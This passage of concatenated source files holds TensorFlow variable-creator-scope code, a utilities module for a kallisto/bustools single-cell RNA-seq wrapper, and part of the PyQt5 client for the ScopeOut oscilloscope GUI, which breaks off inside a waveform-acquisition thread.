        which is the initial value for the Variable. The initial value must have
        a shape specified unless `validate_shape` is set to False. Can also be a
        callable with no argument that returns the initial value when called. In
        that case, `dtype` must be specified. (Note that initializer functions
        from init_ops.py must first be bound to a shape before being used here.)
      trainable: If `True`, the default, also adds the variable to the graph
        collection `GraphKeys.TRAINABLE_VARIABLES`. This collection is used as
        the default list of variables to use by the `Optimizer` classes.
        `trainable` defaults to `True`, unless `synchronization` is
        set to `ON_READ`, in which case it defaults to `False`.
      collections: List of graph collections keys. The new variable is added to
        these collections. Defaults to `[GraphKeys.GLOBAL_VARIABLES]`.
      validate_shape: If `False`, allows the variable to be initialized with a
        value of unknown shape. If `True`, the default, the shape of
        `initial_value` must be known.
      caching_device: Optional device string describing where the Variable
        should be cached for reading. Defaults to the Variable's device.
        If not `None`, caches on another device. Typical use is to cache
        on the device where the Ops using the Variable reside, to deduplicate
        copying through `Switch` and other conditional statements.
      name: Optional name for the variable. Defaults to `'Variable'` and gets
        uniquified automatically.
      dtype: If set, initial_value will be converted to the given type.
        If `None`, either the datatype will be kept (if `initial_value` is
        a Tensor), or `convert_to_tensor` will decide.
      constraint: A constraint function to be applied to the variable after
        updates by some algorithms.
      use_resource: if True, a ResourceVariable is always created.
      synchronization: Indicates when a distributed a variable will be
        aggregated. Accepted values are constants defined in the class
        `tf.VariableSynchronization`. By default the synchronization is set to
        `AUTO` and the current `DistributionStrategy` chooses
        when to synchronize.
      aggregation: Indicates how a distributed variable will be aggregated.
        Accepted values are constants defined in the class
        `tf.VariableAggregation`.

  This set may grow over time, so it's important the signature of creators is as
  mentioned above.

  Args:
    variable_creator: the passed creator

  Yields:
    A scope in which the creator is active
  """
  # Creator scopes live on the graph so they apply to every variable created
  # while this graph is the default.
  with ops.get_default_graph()._variable_creator_scope(variable_creator):  # pylint: disable=protected-access
    yield
# Note: only the docstrings differ between this and v1.
@tf_export("variable_creator_scope", v1=[])
@tf_contextlib.contextmanager
def variable_creator_scope(variable_creator):
  """Scope which defines a variable creation function to be used by variable().

  variable_creator is expected to be a function with the following signature:

  ```
    def variable_creator(next_creator, **kwargs)
  ```

  The creator is supposed to eventually call the next_creator to create a
  variable if it does want to create a variable and not call Variable or
  ResourceVariable directly. This helps make creators composable. A creator may
  choose to create multiple variables, return already existing variables, or
  simply register that a variable was created and defer to the next creators in
  line. Creators can also modify the keyword arguments seen by the next
  creators.

  Custom getters in the variable scope will eventually resolve down to these
  custom creators when they do create variables.

  The valid keyword arguments in kwds are:

      initial_value: A `Tensor`, or Python object convertible to a `Tensor`,
        which is the initial value for the Variable. The initial value must have
        a shape specified unless `validate_shape` is set to False. Can also be a
        callable with no argument that returns the initial value when called. In
        that case, `dtype` must be specified. (Note that initializer functions
        from init_ops.py must first be bound to a shape before being used here.)
      trainable: If `True`, the default, GradientTapes automatically watch
        uses of this Variable.
      validate_shape: If `False`, allows the variable to be initialized with a
        value of unknown shape. If `True`, the default, the shape of
        `initial_value` must be known.
      caching_device: Optional device string describing where the Variable
        should be cached for reading. Defaults to the Variable's device.
        If not `None`, caches on another device. Typical use is to cache
        on the device where the Ops using the Variable reside, to deduplicate
        copying through `Switch` and other conditional statements.
      name: Optional name for the variable. Defaults to `'Variable'` and gets
        uniquified automatically.
      dtype: If set, initial_value will be converted to the given type.
        If `None`, either the datatype will be kept (if `initial_value` is
        a Tensor), or `convert_to_tensor` will decide.
      constraint: A constraint function to be applied to the variable after
        updates by some algorithms.
      synchronization: Indicates when a distributed a variable will be
        aggregated. Accepted values are constants defined in the class
        `tf.VariableSynchronization`. By default the synchronization is set to
        `AUTO` and the current `DistributionStrategy` chooses
        when to synchronize.
      aggregation: Indicates how a distributed variable will be aggregated.
        Accepted values are constants defined in the class
        `tf.VariableAggregation`.

  This set may grow over time, so it's important the signature of creators is as
  mentioned above.

  Args:
    variable_creator: the passed creator

  Yields:
    A scope in which the creator is active
  """
  # Identical body to the v1 symbol; only the docstring differs.
  with ops.get_default_graph()._variable_creator_scope(variable_creator):  # pylint: disable=protected-access
    yield
|
utils.py | import concurrent.futures
import logging
import os
import re
import shutil
import subprocess as sp
import threading
import time
from urllib.request import urlretrieve
import anndata
import ngs_tools as ngs
import pandas as pd
import scipy.io
from scipy import sparse
from tqdm import tqdm
from .config import (
get_bustools_binary_path,
get_kallisto_binary_path,
PLATFORM,
TECHNOLOGIES_MAPPING,
UnsupportedOSException,
)
from .dry import dryable
from .dry import utils as dry_utils
from .logging import logger
from .stats import STATS
# Matches the technology name: the first whitespace-delimited token of a line
# of `kallisto bus --list` output.
TECHNOLOGY_PARSER = re.compile(r'^(?P<name>\S+)')
# Extracts (major, minor, patch) integers from a binary's usage/version text.
# NOTE(review): the dots are unescaped and so match any character; this is
# harmless for well-formed version strings but `\.` would be stricter.
VERSION_PARSER = re.compile(r'^\S*? ([0-9]+).([0-9]+).([0-9]+)')
# These functions have been moved as of 0.26.1 to the ngs_tools library but are
# imported from this file in other places. For now, let's keep these here.
# TODO: remove these
open_as_text = ngs.utils.open_as_text
decompress_gzip = ngs.utils.decompress_gzip
compress_gzip = ngs.utils.compress_gzip
concatenate_files = ngs.utils.concatenate_files_as_text
download_file = ngs.utils.download_file
# Wrapped with `dryable` so that dry runs print the action instead of actually
# creating a temporary file.
get_temporary_filename = dryable(dry_utils.get_temporary_filename)(
    ngs.utils.mkstemp
)
class NotImplementedException(Exception):
    """Raised for functionality that is not implemented."""
    pass
class UnmetDependencyException(Exception):
    """Raised when a required external dependency is missing or unusable."""
    pass
class TqdmLoggingHandler(logging.Handler):
    """Logging handler that writes records via ``tqdm.write`` so that log
    output does not corrupt any active tqdm progress bars.
    """

    def __init__(self, level=logging.NOTSET):
        super().__init__(level)

    def emit(self, record):
        """Format the record and emit it through tqdm, then flush."""
        try:
            tqdm.write(self.format(record))
            self.flush()
        except (KeyboardInterrupt, SystemExit):
            # Never swallow interpreter-exit signals.
            raise
        except Exception:
            self.handleError(record)
def update_filename(filename, code):
    """Insert *code* between the stem and the extension of *filename*.

    For instance, if `filename` is 'output.bus' and `code` is `s` (for sort),
    this function returns `output.s.bus`.

    :param filename: filename (NOT a path)
    :type filename: str
    :param code: code to append to the filename stem
    :type code: str
    :return: filename updated with the provided code
    :rtype: str
    """
    stem, extension = os.path.splitext(filename)
    return ''.join((stem, '.', code, extension))
@dryable(dry_utils.make_directory)
def make_directory(path):
    """Quietly make the specified directory (and any intermediate directories).

    This function is a wrapper around os.makedirs. It is used so that
    the appropriate mkdir command can be printed for dry runs.

    :param path: path to directory to make
    :type path: str
    """
    # exist_ok keeps this idempotent when the directory already exists.
    os.makedirs(path, exist_ok=True)
@dryable(dry_utils.remove_directory)
def remove_directory(path):
    """Quietly remove the specified directory (and any subdirectories).

    This function is a wrapper around shutil.rmtree. It is used so that
    the appropriate rm command can be printed for dry runs.

    :param path: path to directory to remove
    :type path: str
    """
    # ignore_errors makes this a no-op when the directory does not exist.
    shutil.rmtree(path, ignore_errors=True)
@dryable(dry_utils.run_executable)
def run_executable(
    command,
    stdin=None,
    stdout=sp.PIPE,
    stderr=sp.PIPE,
    wait=True,
    stream=True,
    quiet=False,
    returncode=0,
    alias=True,
    record=True,
):
    """Execute a single shell command.

    :param command: a list representing a single shell command
    :type command: list
    :param stdin: object to pass into the `stdin` argument for `subprocess.Popen`,
        defaults to `None`
    :type stdin: stream, optional
    :param stdout: object to pass into the `stdout` argument for `subprocess.Popen`,
        defaults to `subprocess.PIPE`
    :type stdout: stream, optional
    :param stderr: object to pass into the `stderr` argument for `subprocess.Popen`,
        defaults to `subprocess.PIPE`
    :type stderr: stream, optional
    :param wait: whether to wait until the command has finished, defaults to `True`
    :type wait: bool, optional
    :param stream: whether to stream the output to the command line, defaults to `True`
    :type stream: bool, optional
    :param quiet: whether to not display anything to the command line and not
        check the return code, defaults to `False`
    :type quiet: bool, optional
    :param returncode: the return code expected if the command runs as intended,
        defaults to `0`
    :type returncode: int, optional
    :param alias: whether to use the basename of the first element of `command`
        when logging/recording, defaults to `True`
    :type alias: bool, optional
    :param record: whether to record the call statistics, defaults to `True`
    :type record: bool, optional
    :raises subprocess.CalledProcessError: if `wait` is True, `quiet` is False
        and the process exits with a code other than `returncode`
    :return: the spawned process
    :rtype: subprocess.Process
    """
    # Popen requires every argument to be a string.
    command = [str(c) for c in command]
    c = command.copy()
    if alias:
        # Log/record only the binary's basename, not its full path.
        c[0] = os.path.basename(c[0])
    if not quiet:
        logger.debug(' '.join(c))
    if not wait and record:
        # Fire-and-forget processes are recorded up front, since there will be
        # no completion time to attach later.
        STATS.command(c)
    start = time.time()
    p = sp.Popen(
        command,
        stdin=stdin,
        stdout=stdout,
        stderr=stderr,
        universal_newlines=wait,  # text mode only when output is read below
        bufsize=1 if wait else -1,  # line-buffered when streaming line by line
    )
    # Wait if desired.
    if wait:
        out = []
        while p.poll() is None:
            if stream and not quiet:
                # NOTE(review): stdout is drained fully before stderr; if the
                # child fills the stderr pipe first this could block — confirm
                # the wrapped binaries never interleave large output streams.
                for line in p.stdout:
                    out.append(line.strip())
                    logger.debug(line.strip())
                for line in p.stderr:
                    out.append(line.strip())
                    logger.debug(line.strip())
        if record:
            STATS.command(c, runtime=time.time() - start)
        if not quiet and p.returncode != returncode:
            # Surface the captured output before raising.
            logger.error('\n'.join(out))
            raise sp.CalledProcessError(p.returncode, ' '.join(command))
    return p
def get_kallisto_version():
    """Get the version of the bundled kallisto binary.

    This function parses the help text produced by running the included
    kallisto binary with no arguments.

    :return: tuple of major, minor, patch versions, or `None` if the version
        could not be parsed
    :rtype: tuple or None
    """
    process = run_executable(
        [get_kallisto_binary_path()], quiet=True, returncode=1, record=False
    )
    match = VERSION_PARSER.match(process.stdout.read())
    if not match:
        return None
    return tuple(int(part) for part in match.groups())
def get_bustools_version():
    """Get the version of the bundled bustools binary.

    This function parses the help text produced by running the included
    bustools binary with no arguments.

    :return: tuple of major, minor, patch versions, or `None` if the version
        could not be parsed
    :rtype: tuple or None
    """
    process = run_executable(
        [get_bustools_binary_path()], quiet=True, returncode=1, record=False
    )
    match = VERSION_PARSER.match(process.stdout.read())
    if not match:
        return None
    return tuple(int(part) for part in match.groups())
def parse_technologies(lines):
    """Parse a list of strings into a set of supported technologies.

    This function parses the technologies printed by running
    `kallisto bus --list`: everything after the dashed header ruler and
    before the first blank line is a technology row, whose first
    whitespace-delimited token is the technology name.

    :param lines: the output of `kallisto bus --list` split into lines
    :type lines: iterable
    :return: set of technology names (the original docstring said "list",
        but a set has always been returned)
    :rtype: set
    """
    # Inlined (previously the module-level TECHNOLOGY_PARSER) so the function
    # is self-contained; the pattern grabs the first non-space token.
    name_pattern = re.compile(r'^(?P<name>\S+)')
    technologies = set()
    parsing = False
    for line in lines:
        if line.startswith('-'):
            # The dashed ruler marks the start of the technology table.
            parsing = True
            continue
        if parsing:
            if line.isspace():
                # A whitespace-only line terminates the table.
                break
            match = name_pattern.match(line)
            if match:
                technologies.add(match['name'])
    return technologies
def get_supported_technologies():
    """Fetch the technologies supported by the bundled kallisto.

    Runs ``kallisto bus --list`` and parses the resulting output.

    :return: set of technology names, as produced by :func:`parse_technologies`
    :rtype: set
    """
    process = run_executable(
        [get_kallisto_binary_path(), 'bus', '--list'],
        quiet=True,
        returncode=1,
        record=False,
    )
    return parse_technologies(process.stdout)
def whitelist_provided(technology):
    """Determine whether a pre-packaged whitelist exists for a technology.

    :param technology: the name of the technology (case-insensitive)
    :type technology: str
    :return: whether the whitelist is provided
    :rtype: bool
    """
    key = technology.upper()
    if key not in TECHNOLOGIES_MAPPING:
        return False
    return TECHNOLOGIES_MAPPING[key].chemistry.has_whitelist
@dryable(dry_utils.move_file)
def move_file(source, destination):
    """Move a file from source to destination, overwriting the file if the
    destination exists.

    :param source: path to source file
    :type source: str
    :param destination: path to destination
    :type destination: str
    :return: path to moved file
    :rtype: str
    """
    shutil.move(source, destination)
    return destination
@dryable(dry_utils.copy_whitelist)
def copy_whitelist(technology, out_dir):
    """Copy the packaged whitelist for the specified technology into a directory.

    The packaged whitelist may be compressed; it is decompressed on copy (the
    output filename is the archive's basename with its last extension removed).

    :param technology: the name of the technology
    :type technology: str
    :param out_dir: directory to put the whitelist
    :type out_dir: str
    :return: path to the copied whitelist
    :rtype: str
    """
    tech = TECHNOLOGIES_MAPPING[technology.upper()]
    archive_path = tech.chemistry.whitelist_path
    basename = os.path.splitext(os.path.basename(archive_path))[0]
    whitelist_path = os.path.join(out_dir, basename)
    with open_as_text(archive_path, 'r') as src:
        contents = src.read()
    with open(whitelist_path, 'w') as dst:
        dst.write(contents)
    return whitelist_path
@dryable(dry_utils.copy_map)
def copy_map(technology, out_dir):
    """Copy the packaged feature-to-cell-barcode map for the specified technology.

    The packaged map may be compressed; it is decompressed on copy (the output
    filename is the archive's basename with its last extension removed).

    :param technology: the name of the technology
    :type technology: str
    :param out_dir: directory to put the map
    :type out_dir: str
    :return: path to the copied map
    :rtype: str
    """
    tech = TECHNOLOGIES_MAPPING[technology.upper()]
    archive_path = tech.chemistry.feature_map_path
    basename = os.path.splitext(os.path.basename(archive_path))[0]
    map_path = os.path.join(out_dir, basename)
    with open_as_text(archive_path, 'r') as src:
        contents = src.read()
    with open(map_path, 'w') as dst:
        dst.write(contents)
    return map_path
@dryable(dry_utils.stream_file)
def stream_file(url, path):
    """Create a FIFO file to use for piping remote files into processes.

    This function spawns a new thread to download the remote file into a FIFO
    file object. FIFO file objects are only supported on unix systems.

    :param url: url to the file
    :type url: str
    :param path: path to place FIFO file
    :type path: str
    :raises UnsupportedOSException: if the OS is Windows
    :return: path to FIFO file
    :rtype: str
    """
    # Windows does not support FIFO files (os.mkfifo is unavailable).
    if PLATFORM == 'windows':
        # Fix: the two string fragments previously concatenated without a
        # separating space, producing "...remote files.Please download...".
        raise UnsupportedOSException((
            'Windows does not support piping remote files. '
            'Please download the file manually.'
        ))
    logger.info('Piping {} to {}'.format(url, path))
    os.mkfifo(path)
    # Daemon thread: an unread FIFO must never block interpreter shutdown.
    t = threading.Thread(target=urlretrieve, args=(url, path), daemon=True)
    t.start()
    return path
def read_t2g(t2g_path):
    """Given a transcript-to-gene mapping path, read it into a dictionary.

    The first column is always assumed to be the transcript IDs.

    :param t2g_path: path to t2g
    :type t2g_path: str
    :return: dictionary containing transcript IDs as keys and all other columns
        as a tuple as values
    :rtype: dict
    """
    t2g = {}
    with open_as_text(t2g_path, 'r') as f:
        for line in f:
            if line.isspace():
                continue
            split = line.strip().split('\t')
            transcript = split[0]
            other = tuple(split[1:])
            if transcript in t2g:
                # Later entries overwrite earlier ones below.
                logger.warning(
                    f'Found duplicate entries for {transcript} in {t2g_path}. '
                    'Earlier entries will be ignored.'
                )
            t2g[transcript] = other
    return t2g
def import_tcc_matrix_as_anndata(
    matrix_path, barcodes_path, ec_path, txnames_path, threads=8
):
    """Import a TCC matrix as an Anndata object.

    :param matrix_path: path to the matrix ec file
    :type matrix_path: str
    :param barcodes_path: path to the barcodes txt file
    :type barcodes_path: str
    :param ec_path: path to the ec txt file
    :type ec_path: str
    :param txnames_path: path to transcripts.txt generated by `kallisto bus`
    :type txnames_path: str
    :param threads: number of worker threads used to translate equivalence
        classes into transcript IDs, defaults to `8`
    :type threads: int, optional
    :return: a new Anndata object
    :rtype: anndata.Anndata
    """
    df_barcodes = pd.read_csv(
        barcodes_path, index_col=0, header=None, names=['barcode']
    )
    df_ec = pd.read_csv(
        ec_path,
        index_col=0,
        header=None,
        names=['ec', 'transcripts'],
        sep='\t',
        dtype=str
    )
    df_ec.index = df_ec.index.astype(str)  # To prevent logging from anndata
    with open(txnames_path, 'r') as f:
        transcripts = [
            line.strip() for line in f.readlines() if not line.strip().isspace()
        ]
    ts = list(df_ec.transcripts)
    # Translate one EC's comma-delimited transcript indices into transcript IDs.
    get_transcript_ids = lambda ts, transcripts: [
        [transcripts[int(i)] for i in t.split(',')] for t in ts
    ]
    futures = []
    with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:
        # Split the ECs into roughly equal contiguous chunks, one per thread.
        chunk = int(len(ts) / threads) + 1
        for i in range(threads):
            future = executor.submit(
                get_transcript_ids, ts[i * chunk:(i + 1) * chunk], transcripts
            )
            futures.append(future)
    # Futures are consumed in submission order, which preserves EC order.
    transcript_ids = []
    for future in futures:
        transcript_ids += future.result()
    df_ec['transcript_ids'] = transcript_ids
    df_ec.drop('transcripts', axis=1, inplace=True)
    return anndata.AnnData(
        X=scipy.io.mmread(matrix_path).tocsr(), obs=df_barcodes, var=df_ec
    )
def import_matrix_as_anndata(
    matrix_path, barcodes_path, genes_path, t2g_path=None, name='gene'
):
    """Import a matrix as an Anndata object.

    :param matrix_path: path to the matrix ec file
    :type matrix_path: str
    :param barcodes_path: path to the barcodes txt file
    :type barcodes_path: str
    :param genes_path: path to the genes txt file
    :type genes_path: str
    :param t2g_path: path to transcript-to-gene mapping. If this is provided,
        the third column of the mapping is appended to the
        anndata var, defaults to `None`
    :type t2g_path: str, optional
    :param name: name of the columns, defaults to "gene"
    :type name: str, optional
    :return: a new Anndata object
    :rtype: anndata.Anndata
    """
    df_barcodes = pd.read_csv(
        barcodes_path, index_col=0, header=None, names=['barcode']
    )
    df_genes = pd.read_csv(
        genes_path, header=None, index_col=0, names=[f'{name}_id'], sep='\t'
    )
    df_genes.index = df_genes.index.astype(
        str
    )  # To prevent logging from anndata
    mtx = scipy.io.mmread(matrix_path)
    # If any of the genes are duplicated, collapse them by summing their columns.
    if any(df_genes.index.duplicated()):
        logger.debug(
            f'Deduplicating genes found in {genes_path} by adding duplicates'
        )
        mtx = mtx.tocsc()
        # Map each gene ID to every column index it occupies.
        gene_indices = {}
        for i, gene in enumerate(df_genes.index):
            gene_indices.setdefault(gene, []).append(i)
        genes = []
        # lil_matrix supports efficient column-wise assignment while building.
        deduplicated_mtx = sparse.lil_matrix(
            (len(df_barcodes), len(gene_indices))
        )
        for i, gene in enumerate(sorted(gene_indices.keys())):
            genes.append(gene)
            indices = gene_indices[gene]
            deduplicated_mtx[:, i] = mtx[:, indices].sum(axis=1)
        df_genes = pd.DataFrame(index=pd.Series(genes, name=f'{name}_id'))
        mtx = deduplicated_mtx
    # Optionally attach human-readable gene names from the t2g mapping
    # (attribute[0] is the gene ID, attribute[1] the gene name).
    t2g = read_t2g(t2g_path) if t2g_path else {}
    id_to_name = {}
    for transcript, attributes in t2g.items():
        if len(attributes) > 1:
            id_to_name[attributes[0]] = attributes[1]
    gene_names = [id_to_name.get(i, '') for i in df_genes.index]
    if any(bool(g) for g in gene_names):
        df_genes[f'{name}_name'] = gene_names
    return anndata.AnnData(X=mtx.tocsr(), obs=df_barcodes, var=df_genes)
def overlay_anndatas(adata_spliced, adata_unspliced):
    """'Overlay' two anndata objects on the intersection of their obs and var.

    The result carries the spliced matrix as `X` and both matrices as the
    'spliced' and 'unspliced' layers.

    :param adata_spliced: an Anndata object
    :type adata_spliced: anndata.Anndata
    :param adata_unspliced: an Anndata object
    :type adata_unspliced: anndata.Anndata
    :return: a new Anndata object
    :rtype: anndata.Anndata
    """
    shared_obs = adata_spliced.obs.index.intersection(adata_unspliced.obs.index)
    shared_var = adata_spliced.var.index.intersection(adata_unspliced.var.index)
    spliced = adata_spliced[shared_obs][:, shared_var]
    unspliced = adata_unspliced[shared_obs][:, shared_var]
    return anndata.AnnData(
        X=spliced.X,
        layers={'spliced': spliced.X, 'unspliced': unspliced.X},
        obs=unspliced.obs,
        var=unspliced.var,
    )
def sum_anndatas(adata_spliced, adata_unspliced):
    """Sum the counts of two anndata objects over the intersection of their
    obs and var indices.

    :param adata_spliced: an Anndata object
    :type adata_spliced: anndata.Anndata
    :param adata_unspliced: an Anndata object
    :type adata_unspliced: anndata.Anndata
    :return: a new Anndata object
    :rtype: anndata.Anndata
    """
    shared_obs = adata_spliced.obs.index.intersection(adata_unspliced.obs.index)
    shared_var = adata_spliced.var.index.intersection(adata_unspliced.var.index)
    spliced = adata_spliced[shared_obs][:, shared_var]
    unspliced = adata_unspliced[shared_obs][:, shared_var]
    return anndata.AnnData(
        X=spliced.X + unspliced.X,
        obs=unspliced.obs,
        var=unspliced.var,
    )
|
client.py | """
ScopeOut GUI
Defines GUI client that instantiates and controls widgets and threads.
"""
# Set matplotlib to call PyQt5
from matplotlib import rcParams
rcParams['backend'] = 'Qt5Agg'
import threading
import os
import logging
from datetime import date, datetime
from functools import partial
from PyQt5 import QtWidgets, QtCore
from scopeout.utilities import ScopeFinder
from scopeout.models import *
from scopeout.config import ScopeOutConfig as Config
from scopeout.database import ScopeOutDatabase as Database
from scopeout.filesystem import WaveformCsvFile
import scopeout.widgets as sw
class ThreadedClient(QtWidgets.QApplication):
    """
    Launches the GUI and handles I/O.

    GUI components reside within the body of the class itself. This client acquires and manipulates
    data from attached scopes and feeds it to the GUI. Various threads are created to carry out
    USB communication asynchronously.

    NOTES:
    Initially, the client is not connected to any scopes, and searches for them continuously.
    This occurs in the scopeFind thread. When a scope is found, this thread returns, and
    periodic scope checking begins in the scopeCheck thread. A loss of connection should disable
    the interface and initiate scopeFind again.

    Creation of the widgets that make up the actual interface is done in the constructor of this
    class. All Qt Signals that facilitate the interaction of the client with these widgets are
    connected in the connect_signals method.
    """
    # Synchronization primitives shared by all acquisition/search threads.
    lock = threading.Lock()  # Lock for scope resource
    stop_flag = threading.Event()  # Event representing termination of program
    acquisition_stop_flag = threading.Event()  # Event representing termination of continuous acquisition
    channel_set_flag = threading.Event()  # Set when data channel has been successfully changed.
    wave_acquired_flag = threading.Event()  # Set during continuous acquisition when a waveform has been acquired.
    continuous_flag = threading.Event()  # Set while program is finding scopes continuously
    continuous_flag.set()
    # Qt signals used to marshal updates back onto the GUI thread.
    status_change_signal = QtCore.pyqtSignal(str)  # Signal sent to GUI waveform counter.
    scope_change_signal = QtCore.pyqtSignal(object)  # Signal sent to change the active oscilloscope.
    new_wave_signal = QtCore.pyqtSignal(Waveform)
    wave_added_to_db_signal = QtCore.pyqtSignal(Waveform)
    def __init__(self, *args):
        """
        Constructor. Builds all widgets, wires their signals, shows the main
        window, and kicks off the initial scope search.

        :param args: command-line arguments forwarded to QApplication.
        """
        QtWidgets.QApplication.__init__(self, *args)
        # create logger
        self.logger = logging.getLogger('ScopeOut.gui.ThreadedClient')
        self.logger.info("Threaded Client initialized")
        # save a reference to the app database.
        # all access to the database must occur in this thread.
        self.database = None
        self.db_session = None
        # start in single-channel acquisition mode by default.
        self.multi_channel_acquisition = False
        # Create widgets.
        self.acquisition_control = sw.AcquisitionControlWidget(None)
        self.plot = sw.WavePlotWidget()
        self.histogram = sw.HistogramPlotWidget()
        self.wave_options = sw.WaveOptionsTabWidget()
        self.wave_column = sw.WaveColumnWidget()
        self.histogram_options = sw.HistogramOptionsWidget()
        self.logger.info("All Widgets initialized")
        widgets = {
            'column': self.wave_column,
            'plot': self.plot,
            'acqControl': self.acquisition_control,
            'wave_options': self.wave_options,
            'hist_options': self.histogram_options,
            'hist': self.histogram
        }
        commands = {'end': self.close_event}
        # Create main window that holds widgets.
        self.main_window = sw.ScopeOutMainWindow(widgets, commands)
        # Connect the various signals that shuttle data between widgets/threads.
        self.connect_signals()
        # Show the GUI
        self.main_window.show()
        # Oscilloscope and scope finder
        self.scopes = []
        self.active_scope = None
        self.scope_finder = ScopeFinder()
        # Thread timers: find_scope runs almost immediately; check_scope is
        # (re)scheduled every 5 seconds once a scope is connected.
        self.check_scope_timer = threading.Timer(5.0, self.check_scope)
        self.find_scope_timer = threading.Timer(0.1, self.find_scope)
        self.find_scope_timer.start()
    # noinspection PyUnresolvedReferences
    def connect_signals(self):
        """
        Connects signals from subwidgets to appropriate slots. Called once
        from the constructor, after all widgets have been created.
        """
        # Client Signals
        self.status_change_signal.connect(self.main_window.status)
        self.scope_change_signal.connect(self.acquisition_control.set_active_oscilloscope)
        # Each freshly acquired wave is plotted, persisted and histogrammed.
        self.new_wave_signal.connect(self.plot_wave)
        self.new_wave_signal.connect(self.save_wave_to_db)
        self.new_wave_signal.connect(self.update_histogram)
        self.new_wave_signal.connect(self.histogram_options.update_properties)
        self.wave_added_to_db_signal.connect(self.wave_column.add_wave)
        # Acq Control Signals
        self.acquisition_control.acquire_button.clicked.connect(partial(self.acq_event, 'now'))
        self.acquisition_control.acquire_on_trigger_button.clicked.connect(partial(self.acq_event, 'trig'))
        self.acquisition_control.continuous_acquire_button.clicked.connect(partial(self.acq_event, 'cont'))
        self.acquisition_control.channel_combobox.currentIndexChanged.connect(self.set_channel)
        self.acquisition_control.autoset_button.clicked.connect(self.autoset_event)
        self.acquisition_control.stop_acquisition_button.clicked.connect(self.acquisition_stop_flag.set)
        self.acquisition_control.hold_plot_checkbox.toggled.connect(self.wave_column.set_plot_hold)
        # Main window Signals
        self.main_window.reset_action.triggered.connect(self.reset)
        self.main_window.reset_action.triggered.connect(self.wave_column.reset)
        self.main_window.save_action.triggered.connect(self.save_wave_to_disk)
        self.main_window.save_properties_action.triggered.connect(self.save_properties_to_disk)
        self.main_window.save_plot_action.triggered.connect(self.save_plot_to_disk)
        self.main_window.save_histogram_action.triggered.connect(self.save_histogram_to_disk)
        self.main_window.load_session_action.triggered.connect(self.load_database)
        self.main_window.save_settings_action.triggered.connect(self.save_configuration)
        self.main_window.show_plot_action.toggled.connect(self.plot.setEnabled)
        self.main_window.show_histogram_action.toggled.connect(self.histogram.setEnabled)
        # Wave Column Signals
        self.wave_column.wave_signal.connect(self.plot_wave)
        self.wave_column.save_signal.connect(self.save_wave_to_disk)
        self.wave_column.save_properties_signal.connect(self.save_properties_to_disk)
        self.wave_column.delete_signal.connect(self.delete_wave)
        self.wave_column.delete_signal.connect(self.update_histogram)
        # Plot signals
        self.plot.save_plot_action.triggered.connect(self.save_plot_to_disk)
        # Histogram signals
        self.histogram.save_histogram_action.triggered.connect(self.save_histogram_to_disk)
        # Histogram Options signals
        self.histogram_options.property_selector.currentIndexChanged.connect(self.update_histogram)
        self.histogram_options.bin_number_selector.valueChanged.connect(self.update_histogram)
        self.logger.info("Signals connected")
    def save_wave_to_db(self, wave):
        """
        Save a wave and its data in the database.

        :param wave: a Waveform, with its data contained in the x_list and y_list attributes.
        """
        self.db_session.add(wave)
        try:
            self.db_session.commit()
            self.logger.info("Saved waveform #" + str(wave.id) + " to the database")
            self.wave_added_to_db_signal.emit(wave)
            # Raw data points are bulk-inserted separately after the commit,
            # once the wave has been assigned its id.
            data = zip(wave.x_list, wave.y_list)
            self.database.bulk_insert_data_points(data, wave.id)
        except Exception as e:
            self.logger.error(e)
            self.db_session.rollback()
    def plot_wave(self, wave):
        """
        Send a wave to the plotting widget, if plotting is enabled.

        :param wave: a Waveform, with its data contained in the x_list and y_list attributes.
        """
        if self.plot.isEnabled():
            self.plot.show_plot(wave, self.acquisition_control.plot_held, self.acquisition_control.show_peak_window)
    def update_histogram(self):
        """
        Update the histogram widget if the app is in histogram mode.

        The property to histogram is taken from the histogram-options selector;
        its display text is lower-cased and space-replaced to form the Waveform
        attribute name queried from the database.
        """
        if self.histogram.isEnabled():
            wave_property = self.histogram_options.property_selector.currentText().lower().replace(' ', '_')
            if wave_property:
                # Pull the selected property for every stored waveform.
                histogram_list = [val for (val,) in self.db_session.query(getattr(Waveform, wave_property)).all()]
                self.histogram.show_histogram(histogram_list, self.histogram_options.bin_number_selector.value())
                self.histogram.histogram.set_title(wave_property)
    def acq_event(self, mode):
        """
        Executed to collect waveform data from the scope. Spawns a worker
        thread appropriate to the requested mode; the GUI thread returns
        immediately.

        Parameters:
            :mode: A string defining the mode of acquisition: {'now' | 'trig' | 'cont'}
        """
        def process_wave(wave):
            """
            Run desired calculations on an acquired wave and notify listeners.

            Parameters:
                :wave: a Waveform, with its data contained in the x_list and y_list attributes.
            """
            try:
                assert type(wave) is Waveform
                if wave.error is not None:
                    self.logger.error("Wave error: %s", wave.error)
                    self.update_status(wave.error)
                    return
                wave.detect_peak_and_integrate(
                    self.wave_options.peak_detection_mode, self.wave_options.peak_detection_parameters)
                self.logger.info("Successfully acquired waveform from %s", wave.data_channel)
                self.update_status('Waveform acquired on ' + wave.data_channel)
            except Exception as e:
                self.update_status('Error occurred during wave processing. Check log for details.')
                self.logger.error(e)
            finally:
                # Emit unconditionally so listeners see every wave, even on error.
                self.new_wave_signal.emit(wave)

        def immediate_acquisition_thread():
            """
            Contains instructions for acquiring and storing waveforms ASAP.
            self.multi_channel_acquisition serves as the flag to initiate
            multi-channel acquisition.
            """
            self.channel_set_flag.clear()
            if self.active_scope is not None:
                self.update_status('Acquiring data...')
                if not self.multi_channel_acquisition:
                    self.logger.info("Single channel acquisition")
                    try:
                        self.lock.acquire()
                        self.active_scope.make_waveform()
                        wave = self.active_scope.next_waveform
                    except Exception as e:
                        self.logger.error(e)
                        wave = None
                    finally:
                        if self.lock.locked():
                            self.lock.release()
                    if wave is not None and (not self.stop_flag.isSet()):
                        process_wave(wave)
                    else:
                        self.update_status('Error on Waveform Acquisition')
                else:
                    self.logger.info("Multichannel acquisition")
                    self.plot.plot.reset_plot()
                    for i in range(0, self.active_scope.numChannels):
                        try:
                            self.logger.info("Acquiring data from channel %d", i + 1)
                            self.set_channel(i)
                            self.channel_set_flag.wait()
                            self.lock.acquire()
                            self.active_scope.make_waveform()
                            self.lock.release()
                            wave = self.active_scope.next_waveform
                        except Exception as e:
                            self.logger.error(e)
                            wave = None
                        finally:
                            # NOTE(review): the lock may already have been
                            # released above; Lock.locked() is not owner-aware,
                            # so this could release a lock held by another
                            # thread — confirm intended.
                            if self.lock.locked():
                                self.lock.release()
                        if wave is not None and (not self.stop_flag.isSet()):
                            process_wave(wave)
                        else:
                            self.update_status('Error on Waveform Acquisition')
                    self.update_status('Acquired all active channels.')
                    self.multi_channel_acquisition = True
